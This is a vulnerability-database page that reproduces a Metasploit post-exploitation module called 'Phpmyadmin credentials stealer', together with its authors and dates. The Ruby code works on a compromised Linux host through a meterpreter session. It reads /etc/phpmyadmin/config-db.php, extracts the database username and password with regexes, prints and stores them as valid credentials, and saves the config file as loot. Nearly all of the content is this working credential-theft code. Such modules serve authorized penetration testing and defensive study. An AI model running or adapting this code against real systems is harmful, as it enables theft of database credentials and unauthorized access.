Lucene search
K

Phpmyadmin credentials stealer

🗓️ 19 Aug 2018 18:10:19Reported by Chaitanya Haritash [bofheaded], Dhiraj Mishra <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 40 Views

Phpmyadmin credentials stealer module for gathering Phpmyadmin creds from target linux machine

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Phpmyadmin credentials stealer',
        'Description' => %q{
          This module gathers Phpmyadmin creds from target linux machine.
        },
        'License' => MSF_LICENSE,
        'Platform' => ['linux'],
        'SessionTypes' => ['meterpreter'],
        'Author' => [
          'Chaitanya Haritash [bofheaded]',
          'Dhiraj Mishra <[email protected]>'
        ]
      )
    )
  end

  def parse_creds(contents)
    db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
    db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first

    unless db_user && db_pass
      print_error("Couldn't find PhpMyAdmin credentials")
      return
    end

    print_good("User: #{db_user}")
    print_good("Password: #{db_pass}")

    print_status('Storing credentials...')
    store_valid_credential(user: db_user, private: db_pass)
  end

  def run
    print_line("\nPhpMyAdmin Creds Stealer!\n")

    if session.platform.include?('windows')
      print_error('This module is not compatible with windows')
      return
    end

    conf_path = '/etc/phpmyadmin/config-db.php'
    unless file_exist?(conf_path)
      print_error("#{conf_path} doesn't exist on target")
      return
    end

    print_good('PhpMyAdmin config found!')
    res = read_file(conf_path)
    unless res
      print_error('You may not have permissions to read the file.')
      return
    end

    print_good('Extracting creds')
    parse_creds(res)

    p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
    print_good("Config file located at #{p}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 13:47Current
0.1Low risk
Vulners AI Score0.1
40